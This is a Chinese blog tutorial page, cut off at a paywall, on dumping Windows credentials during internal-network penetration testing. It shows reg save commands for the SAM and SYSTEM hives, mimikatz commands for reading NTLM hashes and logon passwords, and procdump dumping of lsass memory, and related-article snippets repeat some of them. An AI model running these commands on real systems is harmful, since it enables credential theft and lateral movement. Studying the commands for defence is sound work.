内网安全之:Windows 密码抓取

最新推荐文章于 2025-06-18 13:06:33 发布
最新推荐文章于 2025-06-18 13:06:33 发布
阅读量4.2k 收藏 6
点赞数 1
CC 4.0 BY-SA版权
分类专栏: Metasploit 文章标签: 安全 windows 内网安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/f_carey/article/details/121319445
本文详细介绍了Windows内网安全中的密码抓取技术,包括使用mimikatz工具抓取NTLM Hash和明文密码,以及HashCat解密。同时,文章也探讨了多种传递攻击方式,如NTLM hash传递、AES-256密钥传递和Ticket传递,并提供了相应的防范措施,如安装KB2871997、关闭Wdigest功能和修改注册表。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

郑重声明:
本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。

Windows 密码抓取

1 mimikatz 抓取密码

注:在 Windows 系统中抓取 NTLM Hash 值或明文密码,必须将权限提升到 System;lsass.exe 进程用于实现 Windows 的安全策略。

  1. 利用通过 SAM 和 System 文件获得 NTLM Hash

    gentilkiwi/mimikatz: A little tool to play with Windows security (github.com)

    # 无工具导出 SAM 文件
reg save hklm\sam sam.hive
reg save hklm\system system.hive
# 使用 mimikatz 读取 SAM 和 System 文件
mimikatz# lsadump::sam /sam:sam.hive /system:system.hive

# 使用 Nishang 的 Get-PassHashes 脚本导出 Hash 值
nishang-0.7.6\Gather> Import-Module .\Get-PassHashes.ps1
Get-PassHashes

  2. 使用 mimikatz 读取本地 SAM 文件

    需要考虑 mimikatz 在目标机器上的免杀特性
# 提权
mimikatz# privilege::debug
# 将权限提升至 System
mimikatz# token::elevate
# 读取本地 SAM 文件,获得 NTLM Hash
mimikatz# lsadump::sam
# 解密 HASH 值
mimikatz# sekurlsa::logonpasswords

    image-20211110092817718

    image-20211110092902820

  3. 使用 mimikatz 离线读取 lsass.dmp 文件

    # 导出 lsass.dmp 文件
找到 lsass.exe 进程,右键选择:创建转储文件

# 利用 procdump 导出 lsass.dmp 文件
procdump.exe -accepteula -ma lsass.exe lsass.dmp

  4. 使用 mimikatz 读取 lsass.dmp 文件中的密码 HASH值

    mimikatz# sekurlsa::m
最低0.47元/天 解锁文章

200万优质内容无限畅学
Windows密码哈希值获取工具
AI
06-07 1539
mimikatz是法国人Benjamin开发的一款功能强大的轻量级调试工具,本意是用来进行个人测试的,但由于其功能强大,能够直接读取Windows操作系统的明文密码,因而闻名于渗透测试领域,可以说是渗透必备工具。这些功能在内网渗透中能够被利用,例如在Windows平台上执行绕过Hash或从内存中获取NT/LM hashes(也可以从交互式登录、服务、远程桌面连接中获取 ),以用于进一步的攻击,而且它的体积也非常小,是内网渗透必备工具。通过下载或直接执行该ps脚本即可获取Windows密码
[密码抓取] Windows 密码抓取 — 浏览器、数据库等其它密码抓取
Blue17 の 小窝
03-11 1592
🌟在一个 Windows 机器中,除了系统登录密码外,其实还有很多其它的密码信息。比如浏览器中存储的密码、Cookie、本地数据库密码信息等。那么本章,笔者就介绍几个专门用于抓这些密码信息的工具。0x0101:BrowserGhost 工具介绍BrowserGhost 支持从 Windows 系统的其它用户账户中提取浏览器保存的密码(如 Chrome、IE 等),方便渗透测试中的横向移动凭据采集。该工具可解密 Chrome 80 版本后的密码加密机制,兼容最新版浏览器。
mimikatz(windows 明文密码抓取工具)
04-02
windows 明文密码抓取工具,分别有32位和64位版本,在XP和win 7 旗舰版上测试成功
深入探究MimikatzWindows系统密码抓取工具
最新发布
weixin_42348783的博客
06-18 1011
Mimikatz是一个广泛使用的安全工具,它能够提取Windows系统中敏感信息,如密码、哈希值和Kerberos票据等。它在安全测试和渗透测试中扮演着重要角色,但同时也可能被滥用导致安全风险。Kerberos是广泛使用的网络认证协议,它通过使用密钥分布中心(KDC)来实现安全的用户和服务之间的认证。Kerberos协议允许用户通过证明自己知道密码的散列(即密钥)来进行认证,而不是明文密码本身,从而提供了双向认证和会话密钥的分发。
几款优秀的Windows密码抓取工具
LuckySec
03-24 9751
前言 本篇介绍几款优秀的Windows上的密码抓取工具,每个工具都有自己的特点非常实用,欢迎补充。 0x01 Mimikatz 个人点评:这款工具非常强大,公认的Windows密码神器。 1. 简介 Mimikat是一个法国人写的轻量级调试器。Mimikat可以从内存中提取纯文本密码,hash,PIN码和kerberos票证。mimikatz还可以执行哈希传递,票证传递或构建Golden票证 项目地址:https://github.com/gentilkiwi/mimikatz/ 2. 使用 cmd运行
Windows 密码,这 7 种技术够不够用!
bigbangbangbang1的博客
12-09 1047
内网渗透中,获取到 Windows 系统权限之后,抓取本地哈希是必不可少的操作,今天分享一款工具,集成了 7 种转储 LSASS 内存的方法,工具地址:运行如图:未提供任何参数运行程序,会要求你输入所要指定的方法,参数为 1-7,功能分别对应:使用解除挂钩技术转储 lsass 内存以注入修改后的 mimikatz 二进制文件。使用解除挂钩技术转储 lsass 内存以使用 MDWD 的直接系统调用注入二进制文件。使用简单的 MiniDumpWriteDump API 转储 lsass 内存。
域横向移动分析
qq_38675102的博客
12-31 1069
windwos内网横移学习笔记
windows认证&密码抓取
qq_44657899的博客
07-15 7267
文章目录基础知识windows版本历史一、工作组部分密码存放在哪里?NTML Hashwindows本地认证windows网络认证NTML v1与v2二、域部分kerbero协议白银票据黄金票据windows密码导出lsass进程抓取mimikatz直接操作lsass进程procdump+mimikatzWindows Server 2016抓取明文密码sam文件(密文,需要破解,或者通过hash传递使用)用工具读取sam文件注册表导出sam文件使用mimipenguin获取linux明文登录密码windo
Mimikatz Windows 密码抓取神器
05-27
这款工具因其强大的密码抓取能力而闻名,可以提取出系统内存中的明文密码、哈希值以及其他敏感凭证,从而帮助安全研究人员检测系统的漏洞和防护措施。 在Windows环境中,Mimikatz 能够执行以下关键功能: 1. **LSA...
红队内网攻防渗透:内网渗透之Windows内网信息收集:内网和域
HACKONE的博客
04-10 712
Telnet协议是tcp/ip协议的一员是Internet远程登陆服务的标准协议和主要方式,快速探测某台主机是否存在某个高危漏洞端口可以使用这个在内网中通常会部署大量的网络安全设备例如IDSIPS日志审计安全网关反病毒等在域网络攻击测试中获取域内一个支点后需要获得域管理员权限在一个域中,当计算机加入域后会默认给域管理员组赋予本地系统管理员权限也就是说当计算机被添加到域中成为域主机系统就会自动将域管理员组添加到本地系统管理员组中因此域管理组的成员均可以访问本地计算机且具备完全的控制权。
内网抓取Windows密码明文与hashdump思考题笔记整理
04-21 1345
Windows中,用户密码不会以明文的形式保存在计算机中,而是通过保存密码的hash值来确保安全性,Windows 默认使用 NTLM 或 Kerberos 身份认证协议进行加密存储密码。LM和NT都是使用hash算法加密,但LM是将明文转为16字节固定长度的hash值,而NTNTLM Hash 使用更复杂的算法和更长的哈希值来存储密码,通常是 32 个字符的长度。NTLM存在一些安全性方面的缺点,包括传输过程中可能被中间人攻击截获密码哈希值的风险,以及在某些情况下可能会暴露密码的明文形式在内存中。
Windows获取密码及hash
LuckySec
05-04 4280
前言 在拿到一台 Windows 的管理员权限以后,可以通过多种方法获取 Windows 系统的明文密码或者 hash 值,这将有利于我们在内网中扩大渗透范围。 0x01 Mimikatz Mimikat是一个法国人写的轻量级调试器。Mimikat可以从内存中提取纯文本密码,hash,PIN码和kerberos票证。 下载地址:https://github.com/gentilkiwi/mimikatzMimikatz上传至受害目标系统上,然后执行如下命令: # cmd命令执行启动程序 mimika
横向移动之windows登录账号密码导出
渗透之路,攻防之间皆学问
02-16 3370
在默认情况下,当系统为win10或2012R2及以上时,默认在内存缓存中禁止保存明文密码,所以无法在 lsass.exe 进程中抓取明文密码。此时可以通过修改注册表的方式抓取明文,但需要用户重新登录后才能成功抓取
mimkatz获取windows10明文密码
banliyaoguai的博客
05-31 2844
Windows 10或更高版本的系统中,默认情况下,操作系统会在内存缓存中禁止保存明文密码。然后,再次使用mimikatz等工具读取lsass.exe进程的内存,即可获取到明文密码mimikatz通过注入代码到操作系统的内存中,能够读取和解密这些由lsass.exe进程保存的加密凭证。具体的操作是,mimikatz先利用管理员权限执行一些操作,如使用procdump等工具lsass.exe进程转储成一个dmp文件。当用户登录时,lsass.exe会使用一个可逆的算法加密明文密码,并将密文保存在内存中。
Mimikatz学习笔记
SWEET0SWAT的博客
02-25 3259
使用SAM和System文件抓取密码 导出sam和system文件抓取密码 reg save hklm\sam sam.hive reg save hklm\system system.hive
针对内网的信息收集——mimikatz抓hash
ygylemon的博客
12-13 1079
之前我们已经用mimikatz抓取windows上的密码,有明文的有hash的,但是这些方法还是远远不够,接下来我讲进一步解锁mimikatz的新姿势!首先获取到一个webshell,在cmd里输入下面这三个命令,在C盘就能看到sam,system,security这三个文件。这个网站看看能不能解出来,要不然就只能通过人脉和在群里臭不要脸的问了(之前的文章有演示过hhhh),话不多说,直接展示。如果上一种方法不行,也可以用这种方法,win7,win10,winserver08都可以抓到的。
内网渗透(二十三)之Windows协议认证和密码抓取-Mimikatz介绍和各种模块使用方法
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-13 590
Mimikatz是法国人benjamin开发的一款功能强大的轻量级调试工具,但由于其功能强大,能够直接读取WindowsXP-2012等操作系统的明文密码而闻名于渗透测试,可以说是渗透必备工具,mimikatz可以从内存中提取明文密码、哈希、PIN 码和 kerberos 票证。 mimikatz 还可以执行哈希传递、票证传递或构建黄金票证
mimikatz抓取windows server2016明文密码
m0_64868272的博客
05-21 547
本文的前提我们要有高权限。否则用不了mimikatz
procdump + mimikatz 获取window10系统密码的方法
onlyfunboy的专栏
06-17 1421
1,管理员权限打开cmd,进入对应目录 procdump64.exe -accepteula -ma lsass.exe lsass.dmp 导出为lsass.dump文件 2,管理员权限打开mimikatz.exe 执行privilege::debug; 3,管理员权限打开cmd,进入对应目录 把lsass.dmp放在mimikatz目录利用 mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit .
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值